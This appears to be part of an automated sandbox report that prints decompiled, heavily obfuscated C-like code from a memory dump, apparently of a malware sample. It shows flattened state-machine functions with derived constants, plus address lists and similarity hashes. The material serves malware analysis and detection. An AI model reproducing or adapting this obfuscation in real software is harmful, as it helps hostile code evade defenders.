                                                                                                                                                                                                                    				_v584 = 0x296b90;
                                                                                                                                                                                                                    				_v584 = _v584 + 0x5295;
                                                                                                                                                                                                                    				_t201 = 0x2e;
                                                                                                                                                                                                                    				_v584 = _v584 / _t201;
                                                                                                                                                                                                                    				_t202 = 0x45;
                                                                                                                                                                                                                    				_v584 = _v584 / _t202;
                                                                                                                                                                                                                    				_v584 = _v584 ^ 0x000dc12c;
                                                                                                                                                                                                                    				_v528 = 0xa5074a;
                                                                                                                                                                                                                    				_v528 = _v528 * 0x74;
                                                                                                                                                                                                                    				_v528 = _v528 ^ 0x4ac01178;
                                                                                                                                                                                                                    				_v532 = 0x5f8991;
                                                                                                                                                                                                                    				_v532 = _v532 + 0xffffa31a;
                                                                                                                                                                                                                    				_v532 = _v532 ^ 0x00502ee6;
                                                                                                                                                                                                                    				_v540 = 0x2988df;
                                                                                                                                                                                                                    				_v540 = _v540 + 0xfde6;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0x00229929;
                                                                                                                                                                                                                    				_v548 = 0x8fe706;
                                                                                                                                                                                                                    				_v548 = _v548 + 0x7a3d;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x0098bf9e;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t170 != 0x61d658) {
                                                                                                                                                                                                                    						if(_t170 == 0x34c073d) {
                                                                                                                                                                                                                    							return E00A79209(_v532, 0,  &_v524, _v548,  &_v524, E00A7A797);
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t170 == 0x6b23090) {
                                                                                                                                                                                                                    							_t166 = E00A75011( &_v524, _v584, _v528);
                                                                                                                                                                                                                    							 *_t166 = 0;
                                                                                                                                                                                                                    							_t170 = 0x34c073d;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t170 != 0xd032026) {
                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t170 = 0x61d658;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_push(_v556);
                                                                                                                                                                                                                    					_push(_v576);
                                                                                                                                                                                                                    					_push(_v544);
                                                                                                                                                                                                                    					_t161 = E00A81E60(0xa610fc, _v560, __eflags);
                                                                                                                                                                                                                    					__eflags =  *0xa83b38 + 0xc;
                                                                                                                                                                                                                    					E00A7E773(_v536,  *0xa83b38 + 0xc,  *0xa83b38 + 0xc, _v552,  *0xa83b38 + 0x21c,  &_v524, _t161,  *0xa83b38 + 0x21c, _v588);
                                                                                                                                                                                                                    					_t205 =  &(_t205[0xa]);
                                                                                                                                                                                                                    					_t166 = E00A7D6DF(_v572, _t161, _v568, _v580);
                                                                                                                                                                                                                    					_t170 = 0x6b23090;
                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                    					__eflags = _t170 - 0x4d4403e;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				return _t166;
                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                    0x00a7dd54
                                                                                                                                                                                                                    0x00a7dd5a
                                                                                                                                                                                                                    0x00a7dd64
                                                                                                                                                                                                                    0x00a7dd6c
                                                                                                                                                                                                                    0x00a7dd71
                                                                                                                                                                                                                    0x00a7dd76
                                                                                                                                                                                                                    0x00a7dd7e
                                                                                                                                                                                                                    0x00a7dd86
                                                                                                                                                                                                                    0x00a7dd8e
                                                                                                                                                                                                                    0x00a7dd96
                                                                                                                                                                                                                    0x00a7dda8
                                                                                                                                                                                                                    0x00a7ddad
                                                                                                                                                                                                                    0x00a7ddb3
                                                                                                                                                                                                                    0x00a7ddb8
                                                                                                                                                                                                                    0x00a7ddc0
                                                                                                                                                                                                                    0x00a7ddc8
                                                                                                                                                                                                                    0x00a7ddd0
                                                                                                                                                                                                                    0x00a7ddd5
                                                                                                                                                                                                                    0x00a7dddd
                                                                                                                                                                                                                    0x00a7dde5
                                                                                                                                                                                                                    0x00a7dded
                                                                                                                                                                                                                    0x00a7ddfa
                                                                                                                                                                                                                    0x00a7ddfd
                                                                                                                                                                                                                    0x00a7de01
                                                                                                                                                                                                                    0x00a7de09
                                                                                                                                                                                                                    0x00a7de11
                                                                                                                                                                                                                    0x00a7de19
                                                                                                                                                                                                                    0x00a7de21
                                                                                                                                                                                                                    0x00a7de2e
                                                                                                                                                                                                                    0x00a7de32
                                                                                                                                                                                                                    0x00a7de3a
                                                                                                                                                                                                                    0x00a7de42
                                                                                                                                                                                                                    0x00a7de4f
                                                                                                                                                                                                                    0x00a7de57
                                                                                                                                                                                                                    0x00a7de5c
                                                                                                                                                                                                                    0x00a7de62
                                                                                                                                                                                                                    0x00a7de6a
                                                                                                                                                                                                                    0x00a7de72
                                                                                                                                                                                                                    0x00a7de7a
                                                                                                                                                                                                                    0x00a7de82
                                                                                                                                                                                                                    0x00a7de8a
                                                                                                                                                                                                                    0x00a7de92
                                                                                                                                                                                                                    0x00a7de9a
                                                                                                                                                                                                                    0x00a7dea2
                                                                                                                                                                                                                    0x00a7deaa
                                                                                                                                                                                                                    0x00a7deb2
                                                                                                                                                                                                                    0x00a7deba
                                                                                                                                                                                                                    0x00a7dec2
                                                                                                                                                                                                                    0x00a7deca
                                                                                                                                                                                                                    0x00a7ded2
                                                                                                                                                                                                                    0x00a7deda
                                                                                                                                                                                                                    0x00a7dee2
                                                                                                                                                                                                                    0x00a7deee
                                                                                                                                                                                                                    0x00a7def3
                                                                                                                                                                                                                    0x00a7defd
                                                                                                                                                                                                                    0x00a7df00
                                                                                                                                                                                                                    0x00a7df04
                                                                                                                                                                                                                    0x00a7df11
                                                                                                                                                                                                                    0x00a7df28
                                                                                                                                                                                                                    0x00a7df2c
                                                                                                                                                                                                                    0x00a7df34
                                                                                                                                                                                                                    0x00a7df3c
                                                                                                                                                                                                                    0x00a7df44
                                                                                                                                                                                                                    0x00a7df4c
                                                                                                                                                                                                                    0x00a7df54
                                                                                                                                                                                                                    0x00a7df5c
                                                                                                                                                                                                                    0x00a7df64
                                                                                                                                                                                                                    0x00a7df6c
                                                                                                                                                                                                                    0x00a7df74
                                                                                                                                                                                                                    0x00a7df7c
                                                                                                                                                                                                                    0x00a7df7c
                                                                                                                                                                                                                    0x00a7df82
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e04e
                                                                                                                                                                                                                    0x00a7df8a
                                                                                                                                                                                                                    0x00a7dfa8
                                                                                                                                                                                                                    0x00a7dfb0
                                                                                                                                                                                                                    0x00a7dfb3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7dfb3
                                                                                                                                                                                                                    0x00a7df92
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7df98
                                                                                                                                                                                                                    0x00a7df98
                                                                                                                                                                                                                    0x00a7dfb7
                                                                                                                                                                                                                    0x00a7dfc0
                                                                                                                                                                                                                    0x00a7dfc4
                                                                                                                                                                                                                    0x00a7dfcc
                                                                                                                                                                                                                    0x00a7dffb
                                                                                                                                                                                                                    0x00a7e003
                                                                                                                                                                                                                    0x00a7e008
                                                                                                                                                                                                                    0x00a7e019
                                                                                                                                                                                                                    0x00a7e020
                                                                                                                                                                                                                    0x00a7e022
                                                                                                                                                                                                                    0x00a7e022
                                                                                                                                                                                                                    0x00a7e022
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: =z$C}>$s?sd${x$.P
                                                                                                                                                                                                                    • API String ID: 0-3435833270
                                                                                                                                                                                                                    • Opcode ID: d41f100b2400afb76d5d1fb6c3dd885017f31b4b6334b9844fdbb118a2b15446
                                                                                                                                                                                                                    • Instruction ID: 19ba1690abb91f95279ae8bafacfe13c29c4b29e94153b395f1bf63e3a6d9610
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d41f100b2400afb76d5d1fb6c3dd885017f31b4b6334b9844fdbb118a2b15446
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96711FB25083019FD358CF26D98951BBBF1FBC8368F50891DF19A96261D3B18A49CF87
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                    			E00A722BB() {
                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                    				signed int _v532;
                                                                                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                                                                                    				intOrPtr _v540;
                                                                                                                                                                                                                    				intOrPtr _v544;
                                                                                                                                                                                                                    				intOrPtr _v548;
                                                                                                                                                                                                                    				intOrPtr _v552;
                                                                                                                                                                                                                    				intOrPtr _v556;
                                                                                                                                                                                                                    				intOrPtr _v560;
                                                                                                                                                                                                                    				char _v564;
                                                                                                                                                                                                                    				intOrPtr _v568;
                                                                                                                                                                                                                    				char _v572;
                                                                                                                                                                                                                    				signed int _v576;
                                                                                                                                                                                                                    				signed int _v580;
                                                                                                                                                                                                                    				signed int _v584;
                                                                                                                                                                                                                    				signed int _v588;
                                                                                                                                                                                                                    				signed int _v592;
                                                                                                                                                                                                                    				signed int _v596;
                                                                                                                                                                                                                    				signed int _v600;
                                                                                                                                                                                                                    				signed int _v604;
                                                                                                                                                                                                                    				signed int _v608;
                                                                                                                                                                                                                    				signed int _v612;
                                                                                                                                                                                                                    				signed int _v616;
                                                                                                                                                                                                                    				signed int _v620;
                                                                                                                                                                                                                    				signed int _v624;
                                                                                                                                                                                                                    				signed int _v628;
                                                                                                                                                                                                                    				signed int _v632;
                                                                                                                                                                                                                    				signed int _v636;
                                                                                                                                                                                                                    				signed int _v640;
                                                                                                                                                                                                                    				signed int _v644;
                                                                                                                                                                                                                    				signed int _v648;
                                                                                                                                                                                                                    				signed int _v652;
                                                                                                                                                                                                                    				signed int _v656;
                                                                                                                                                                                                                    				signed int _v660;
                                                                                                                                                                                                                    				signed int _v664;
                                                                                                                                                                                                                    				signed int _v668;
                                                                                                                                                                                                                    				signed int _v672;
                                                                                                                                                                                                                    				signed int _v676;
                                                                                                                                                                                                                    				signed int _v680;
                                                                                                                                                                                                                    				signed int _v684;
                                                                                                                                                                                                                    				signed int _t301;
                                                                                                                                                                                                                    				intOrPtr _t303;
                                                                                                                                                                                                                    				void* _t306;
                                                                                                                                                                                                                    				void* _t308;
                                                                                                                                                                                                                    				void* _t309;
                                                                                                                                                                                                                    				char _t318;
                                                                                                                                                                                                                    				signed int _t342;
                                                                                                                                                                                                                    				signed int _t343;
                                                                                                                                                                                                                    				signed int _t344;
                                                                                                                                                                                                                    				signed int _t345;
                                                                                                                                                                                                                    				signed int _t346;
                                                                                                                                                                                                                    				signed int* _t349;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t349 =  &_v684;
                                                                                                                                                                                                                    				_v652 = 0x56d668;
                                                                                                                                                                                                                    				_v652 = _v652 >> 1;
                                                                                                                                                                                                                    				_t309 = 0x53023ef;
                                                                                                                                                                                                                    				_v652 = _v652 >> 0xf;
                                                                                                                                                                                                                    				_t342 = 5;
                                                                                                                                                                                                                    				_v652 = _v652 / _t342;
                                                                                                                                                                                                                    				_v652 = _v652 ^ 0x00000010;
                                                                                                                                                                                                                    				_t308 = 0;
                                                                                                                                                                                                                    				_v600 = 0x80685c;
                                                                                                                                                                                                                    				_v600 = _v600 | 0xc911ef7a;
                                                                                                                                                                                                                    				_v600 = _v600 ^ 0xc991ee7e;
                                                                                                                                                                                                                    				_v636 = 0x5b53ff;
                                                                                                                                                                                                                    				_t343 = 0x50;
                                                                                                                                                                                                                    				_v636 = _v636 / _t343;
                                                                                                                                                                                                                    				_v636 = _v636 + 0x43a0;
                                                                                                                                                                                                                    				_v636 = _v636 + 0x1e59;
                                                                                                                                                                                                                    				_v636 = _v636 ^ 0x0001863b;
                                                                                                                                                                                                                    				_v592 = 0x41b495;
                                                                                                                                                                                                                    				_v592 = _v592 | 0xb5caf589;
                                                                                                                                                                                                                    				_v592 = _v592 ^ 0xb5cbf59d;
                                                                                                                                                                                                                    				_v576 = 0x22d4b0;
                                                                                                                                                                                                                    				_t344 = 0x66;
                                                                                                                                                                                                                    				_v576 = _v576 * 0x7e;
                                                                                                                                                                                                                    				_v576 = _v576 ^ 0x112cc52d;
                                                                                                                                                                                                                    				_v584 = 0x264b40;
                                                                                                                                                                                                                    				_v584 = _v584 + 0xffff28f6;
                                                                                                                                                                                                                    				_v584 = _v584 ^ 0x00224c8c;
                                                                                                                                                                                                                    				_v624 = 0x204128;
                                                                                                                                                                                                                    				_t48 =  &_v624; // 0x204128
                                                                                                                                                                                                                    				_v624 =  *_t48 / _t344;
                                                                                                                                                                                                                    				_v624 = _v624 << 0xf;
                                                                                                                                                                                                                    				_v624 = _v624 ^ 0x287a6c90;
                                                                                                                                                                                                                    				_v616 = 0xc5503b;
                                                                                                                                                                                                                    				_v616 = _v616 << 0xf;
                                                                                                                                                                                                                    				_v616 = _v616 << 7;
                                                                                                                                                                                                                    				_v616 = _v616 ^ 0x0ec5a08c;
                                                                                                                                                                                                                    				_v680 = 0x945e0e;
                                                                                                                                                                                                                    				_v680 = _v680 + 0x2faf;
                                                                                                                                                                                                                    				_v680 = _v680 << 0x10;
                                                                                                                                                                                                                    				_v680 = _v680 >> 0xa;
                                                                                                                                                                                                                    				_v680 = _v680 ^ 0x002ab1ff;
                                                                                                                                                                                                                    				_v684 = 0x657cf4;
                                                                                                                                                                                                                    				_t345 = 0x37;
                                                                                                                                                                                                                    				_v684 = _v684 / _t345;
                                                                                                                                                                                                                    				_v684 = _v684 >> 3;
                                                                                                                                                                                                                    				_v684 = _v684 + 0xffff41cc;
                                                                                                                                                                                                                    				_v684 = _v684 ^ 0xfff708d0;
                                                                                                                                                                                                                    				_v664 = 0xad1ba4;
                                                                                                                                                                                                                    				_v664 = _v664 + 0xffffec7e;
                                                                                                                                                                                                                    				_v664 = _v664 + 0xc577;
                                                                                                                                                                                                                    				_v664 = _v664 * 0x45;
                                                                                                                                                                                                                    				_v664 = _v664 ^ 0x2eda1197;
                                                                                                                                                                                                                    				_v596 = 0xc1e3ec;
                                                                                                                                                                                                                    				_v596 = _v596 << 9;
                                                                                                                                                                                                                    				_v596 = _v596 ^ 0x83c3f480;
                                                                                                                                                                                                                    				_v620 = 0x5a9bd7;
                                                                                                                                                                                                                    				_v620 = _v620 >> 3;
                                                                                                                                                                                                                    				_v620 = _v620 + 0xffff3f5d;
                                                                                                                                                                                                                    				_v620 = _v620 ^ 0x0000f7d8;
                                                                                                                                                                                                                    				_v672 = 0x615815;
                                                                                                                                                                                                                    				_v672 = _v672 + 0xffff7999;
                                                                                                                                                                                                                    				_v672 = _v672 ^ 0xcc3490ae;
                                                                                                                                                                                                                    				_v672 = _v672 >> 8;
                                                                                                                                                                                                                    				_v672 = _v672 ^ 0x00caf8b7;
                                                                                                                                                                                                                    				_v604 = 0x41d68;
                                                                                                                                                                                                                    				_t346 = 0x2c;
                                                                                                                                                                                                                    				_v604 = _v604 * 0x65;
                                                                                                                                                                                                                    				_v604 = _v604 ^ 0x0196ee0b;
                                                                                                                                                                                                                    				_v612 = 0xfa48e7;
                                                                                                                                                                                                                    				_v612 = _v612 ^ 0x6336aa58;
                                                                                                                                                                                                                    				_v612 = _v612 + 0xffffb924;
                                                                                                                                                                                                                    				_v612 = _v612 ^ 0x63c5fcec;
                                                                                                                                                                                                                    				_v656 = 0x12544b;
                                                                                                                                                                                                                    				_v656 = _v656 >> 2;
                                                                                                                                                                                                                    				_v656 = _v656 ^ 0x4662d7c5;
                                                                                                                                                                                                                    				_v656 = _v656 << 1;
                                                                                                                                                                                                                    				_v656 = _v656 ^ 0x8cc3a6c1;
                                                                                                                                                                                                                    				_v660 = 0xd812bc;
                                                                                                                                                                                                                    				_v660 = _v660 + 0xffff4b24;
                                                                                                                                                                                                                    				_v660 = _v660 << 0xd;
                                                                                                                                                                                                                    				_v660 = _v660 ^ 0x2e6a0179;
                                                                                                                                                                                                                    				_v660 = _v660 ^ 0xc5dd813f;
                                                                                                                                                                                                                    				_v628 = 0x6606db;
                                                                                                                                                                                                                    				_v628 = _v628 | 0xd323901e;
                                                                                                                                                                                                                    				_v628 = _v628 << 0xf;
                                                                                                                                                                                                                    				_v628 = _v628 ^ 0xcb6d8bec;
                                                                                                                                                                                                                    				_v580 = 0x23b055;
                                                                                                                                                                                                                    				_v580 = _v580 + 0xffffa502;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0x002a48ff;
                                                                                                                                                                                                                    				_v608 = 0xf20ec7;
                                                                                                                                                                                                                    				_t341 = _v604;
                                                                                                                                                                                                                    				_v608 = _v608 * 0x7e;
                                                                                                                                                                                                                    				_v608 = _v608 ^ 0xa2749d9b;
                                                                                                                                                                                                                    				_v608 = _v608 ^ 0xd55a4169;
                                                                                                                                                                                                                    				_v668 = 0xf79a82;
                                                                                                                                                                                                                    				_v668 = _v668 ^ 0xe0f29546;
                                                                                                                                                                                                                    				_v668 = _v668 << 0xb;
                                                                                                                                                                                                                    				_v668 = _v668 + 0xbe10;
                                                                                                                                                                                                                    				_v668 = _v668 ^ 0x287868e8;
                                                                                                                                                                                                                    				_v676 = 0x8dbfa0;
                                                                                                                                                                                                                    				_v676 = _v676 + 0xcbcf;
                                                                                                                                                                                                                    				_v676 = _v676 ^ 0x8a52365e;
                                                                                                                                                                                                                    				_v676 = _v676 / _t346;
                                                                                                                                                                                                                    				_v676 = _v676 ^ 0x0326cd24;
                                                                                                                                                                                                                    				_v588 = 0x2dea0f;
                                                                                                                                                                                                                    				_v588 = _v588 << 7;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0x16f64da3;
                                                                                                                                                                                                                    				_v644 = 0x77e265;
                                                                                                                                                                                                                    				_v644 = _v644 << 6;
                                                                                                                                                                                                                    				_v644 = _v644 >> 1;
                                                                                                                                                                                                                    				_v644 = _v644 << 5;
                                                                                                                                                                                                                    				_v644 = _v644 ^ 0xdf8314a7;
                                                                                                                                                                                                                    				_v632 = 0x3034fc;
                                                                                                                                                                                                                    				_v632 = _v632 >> 0xe;
                                                                                                                                                                                                                    				_v632 = _v632 + 0xb23e;
                                                                                                                                                                                                                    				_v632 = _v632 * 0x57;
                                                                                                                                                                                                                    				_v632 = _v632 ^ 0x003e168a;
                                                                                                                                                                                                                    				_v640 = 0x5a22b3;
                                                                                                                                                                                                                    				_v640 = _v640 >> 0x10;
                                                                                                                                                                                                                    				_v640 = _v640 << 0xf;
                                                                                                                                                                                                                    				_v640 = _v640 << 0xd;
                                                                                                                                                                                                                    				_v640 = _v640 ^ 0xa00cf547;
                                                                                                                                                                                                                    				_v648 = 0xa04d85;
                                                                                                                                                                                                                    				_v648 = _v648 << 0xd;
                                                                                                                                                                                                                    				_v648 = _v648 | 0x9214a690;
                                                                                                                                                                                                                    				_v648 = _v648 >> 8;
                                                                                                                                                                                                                    				_v648 = _v648 ^ 0x009fc136;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t309 != 0x4bdfdab) {
                                                                                                                                                                                                                    						if(_t309 == 0x53023ef) {
                                                                                                                                                                                                                    							_t309 = 0x93d27ac;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t309 == 0x66dfb3d) {
                                                                                                                                                                                                                    								_push(_v684);
                                                                                                                                                                                                                    								_push(_v680);
                                                                                                                                                                                                                    								_push(_v616);
                                                                                                                                                                                                                    								E00A7E773(_v596, __eflags,  *0xa83b38 + 0xc, _v620, 0xa610fc,  &_v524, E00A81E60(0xa610fc, _v624, __eflags),  *0xa83b38 + 0x21c, _v672);
                                                                                                                                                                                                                    								_t349 =  &(_t349[0xa]);
                                                                                                                                                                                                                    								E00A7D6DF(_v604, _t291, _v612, _v656);
                                                                                                                                                                                                                    								_t309 = 0xc0356bb;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t309 == 0x93d27ac) {
                                                                                                                                                                                                                    									E00A710CB(_v576,  &_v572, _v584);
                                                                                                                                                                                                                    									_t309 = 0x4bdfdab;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t309 == 0xc0356bb) {
                                                                                                                                                                                                                    										_t301 = E00A7A3E9(_v660, _v636, _t309,  &_v524, _t309, _v628, _v580, 0, _v608, _v668, _v652, _v600);
                                                                                                                                                                                                                    										_t341 = _t301;
                                                                                                                                                                                                                    										_t349 =  &(_t349[0xa]);
                                                                                                                                                                                                                    										__eflags = _t301 - 0xffffffff;
                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                    											_t309 = 0xe29f029;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t309 == 0xe29f029) {
                                                                                                                                                                                                                    											_t303 = _v568;
                                                                                                                                                                                                                    											_t318 = _v572;
                                                                                                                                                                                                                    											_v560 = _t303;
                                                                                                                                                                                                                    											_v552 = _t303;
                                                                                                                                                                                                                    											_v544 = _t303;
                                                                                                                                                                                                                    											_v536 = _t303;
                                                                                                                                                                                                                    											_v532 = _v592;
                                                                                                                                                                                                                    											_v564 = _t318;
                                                                                                                                                                                                                    											_v556 = _t318;
                                                                                                                                                                                                                    											_v548 = _t318;
                                                                                                                                                                                                                    											_v540 = _t318;
                                                                                                                                                                                                                    											_t306 = E00A61DD9(_v676, _v588, _t318,  &_v564, _v644, _t341);
                                                                                                                                                                                                                    											_t349 =  &(_t349[5]);
                                                                                                                                                                                                                    											__eflags = _t306;
                                                                                                                                                                                                                    											_t308 =  !=  ? 1 : _t308;
                                                                                                                                                                                                                    											_t309 = 0xe74133f;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t309 != 0xe74133f) {
                                                                                                                                                                                                                    												goto L17;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												E00A6E2BD(_t341, _v632, _v640, _v648);
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                    						return _t308;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_v572 = _v572 - E00A7B0DD(_t309);
                                                                                                                                                                                                                    					_t309 = 0x66dfb3d;
                                                                                                                                                                                                                    					asm("sbb [esp+0x84], edx");
                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                    					__eflags = _t309 - 0xbcb25e5;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				goto L9;
                                                                                                                                                                                                                    			}























































                                                                                                                                                                                                                    0x00a722bb
                                                                                                                                                                                                                    0x00a722c1
                                                                                                                                                                                                                    0x00a722cb
                                                                                                                                                                                                                    0x00a722cf
                                                                                                                                                                                                                    0x00a722d4
                                                                                                                                                                                                                    0x00a722e3
                                                                                                                                                                                                                    0x00a722e8
                                                                                                                                                                                                                    0x00a722ee
                                                                                                                                                                                                                    0x00a722f3
                                                                                                                                                                                                                    0x00a722f5
                                                                                                                                                                                                                    0x00a722fd
                                                                                                                                                                                                                    0x00a72305
                                                                                                                                                                                                                    0x00a7230d
                                                                                                                                                                                                                    0x00a72319
                                                                                                                                                                                                                    0x00a7231e
                                                                                                                                                                                                                    0x00a72324
                                                                                                                                                                                                                    0x00a7232c
                                                                                                                                                                                                                    0x00a72334
                                                                                                                                                                                                                    0x00a7233c
                                                                                                                                                                                                                    0x00a72344
                                                                                                                                                                                                                    0x00a7234c
                                                                                                                                                                                                                    0x00a72354
                                                                                                                                                                                                                    0x00a72367
                                                                                                                                                                                                                    0x00a7236a
                                                                                                                                                                                                                    0x00a72371
                                                                                                                                                                                                                    0x00a7237c
                                                                                                                                                                                                                    0x00a72384
                                                                                                                                                                                                                    0x00a7238c
                                                                                                                                                                                                                    0x00a72394
                                                                                                                                                                                                                    0x00a7239c
                                                                                                                                                                                                                    0x00a723a4
                                                                                                                                                                                                                    0x00a723a8
                                                                                                                                                                                                                    0x00a723ad
                                                                                                                                                                                                                    0x00a723b5
                                                                                                                                                                                                                    0x00a723bd
                                                                                                                                                                                                                    0x00a723c2
                                                                                                                                                                                                                    0x00a723c7
                                                                                                                                                                                                                    0x00a723cf
                                                                                                                                                                                                                    0x00a723d7
                                                                                                                                                                                                                    0x00a723df
                                                                                                                                                                                                                    0x00a723e4
                                                                                                                                                                                                                    0x00a723e9
                                                                                                                                                                                                                    0x00a723f1
                                                                                                                                                                                                                    0x00a723fd
                                                                                                                                                                                                                    0x00a72400
                                                                                                                                                                                                                    0x00a72404
                                                                                                                                                                                                                    0x00a72409
                                                                                                                                                                                                                    0x00a72411
                                                                                                                                                                                                                    0x00a72419
                                                                                                                                                                                                                    0x00a72421
                                                                                                                                                                                                                    0x00a72429
                                                                                                                                                                                                                    0x00a72436
                                                                                                                                                                                                                    0x00a7243a
                                                                                                                                                                                                                    0x00a72442
                                                                                                                                                                                                                    0x00a7244a
                                                                                                                                                                                                                    0x00a7244f
                                                                                                                                                                                                                    0x00a72457
                                                                                                                                                                                                                    0x00a7245f
                                                                                                                                                                                                                    0x00a72464
                                                                                                                                                                                                                    0x00a7246c
                                                                                                                                                                                                                    0x00a72474
                                                                                                                                                                                                                    0x00a7247c
                                                                                                                                                                                                                    0x00a72486
                                                                                                                                                                                                                    0x00a72493
                                                                                                                                                                                                                    0x00a72498
                                                                                                                                                                                                                    0x00a724a0
                                                                                                                                                                                                                    0x00a724af
                                                                                                                                                                                                                    0x00a724b0
                                                                                                                                                                                                                    0x00a724b4
                                                                                                                                                                                                                    0x00a724bc
                                                                                                                                                                                                                    0x00a724c4
                                                                                                                                                                                                                    0x00a724cc
                                                                                                                                                                                                                    0x00a724d4
                                                                                                                                                                                                                    0x00a724dc
                                                                                                                                                                                                                    0x00a724e4
                                                                                                                                                                                                                    0x00a724e9
                                                                                                                                                                                                                    0x00a724f1
                                                                                                                                                                                                                    0x00a724f5
                                                                                                                                                                                                                    0x00a724fd
                                                                                                                                                                                                                    0x00a72505
                                                                                                                                                                                                                    0x00a7250d
                                                                                                                                                                                                                    0x00a72512
                                                                                                                                                                                                                    0x00a7251a
                                                                                                                                                                                                                    0x00a72522
                                                                                                                                                                                                                    0x00a7252a
                                                                                                                                                                                                                    0x00a72532
                                                                                                                                                                                                                    0x00a72537
                                                                                                                                                                                                                    0x00a7253f
                                                                                                                                                                                                                    0x00a72547
                                                                                                                                                                                                                    0x00a7254f
                                                                                                                                                                                                                    0x00a72557
                                                                                                                                                                                                                    0x00a72564
                                                                                                                                                                                                                    0x00a72568
                                                                                                                                                                                                                    0x00a7256c
                                                                                                                                                                                                                    0x00a72574
                                                                                                                                                                                                                    0x00a7257c
                                                                                                                                                                                                                    0x00a72584
                                                                                                                                                                                                                    0x00a7258c
                                                                                                                                                                                                                    0x00a72591
                                                                                                                                                                                                                    0x00a72599
                                                                                                                                                                                                                    0x00a725a1
                                                                                                                                                                                                                    0x00a725a9
                                                                                                                                                                                                                    0x00a725b1
                                                                                                                                                                                                                    0x00a725bf
                                                                                                                                                                                                                    0x00a725c3
                                                                                                                                                                                                                    0x00a725cb
                                                                                                                                                                                                                    0x00a725d3
                                                                                                                                                                                                                    0x00a725d8
                                                                                                                                                                                                                    0x00a725e0
                                                                                                                                                                                                                    0x00a725e8
                                                                                                                                                                                                                    0x00a725ed
                                                                                                                                                                                                                    0x00a725f1
                                                                                                                                                                                                                    0x00a725f6
                                                                                                                                                                                                                    0x00a725fe
                                                                                                                                                                                                                    0x00a72606
                                                                                                                                                                                                                    0x00a7260b
                                                                                                                                                                                                                    0x00a72618
                                                                                                                                                                                                                    0x00a7261c
                                                                                                                                                                                                                    0x00a72624
                                                                                                                                                                                                                    0x00a7262c
                                                                                                                                                                                                                    0x00a72631
                                                                                                                                                                                                                    0x00a72636
                                                                                                                                                                                                                    0x00a7263b
                                                                                                                                                                                                                    0x00a72643
                                                                                                                                                                                                                    0x00a7264b
                                                                                                                                                                                                                    0x00a72650
                                                                                                                                                                                                                    0x00a72658
                                                                                                                                                                                                                    0x00a7265d
                                                                                                                                                                                                                    0x00a72665
                                                                                                                                                                                                                    0x00a72665
                                                                                                                                                                                                                    0x00a72677
                                                                                                                                                                                                                    0x00a7283c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7267d
                                                                                                                                                                                                                    0x00a72683
                                                                                                                                                                                                                    0x00a727c5
                                                                                                                                                                                                                    0x00a727ce
                                                                                                                                                                                                                    0x00a727d2
                                                                                                                                                                                                                    0x00a72815
                                                                                                                                                                                                                    0x00a7281a
                                                                                                                                                                                                                    0x00a7282b
                                                                                                                                                                                                                    0x00a72832
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72689
                                                                                                                                                                                                                    0x00a7268b
                                                                                                                                                                                                                    0x00a727b5
                                                                                                                                                                                                                    0x00a727bb
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72691
                                                                                                                                                                                                                    0x00a72697
                                                                                                                                                                                                                    0x00a72786
                                                                                                                                                                                                                    0x00a7278b
                                                                                                                                                                                                                    0x00a7278d
                                                                                                                                                                                                                    0x00a72790
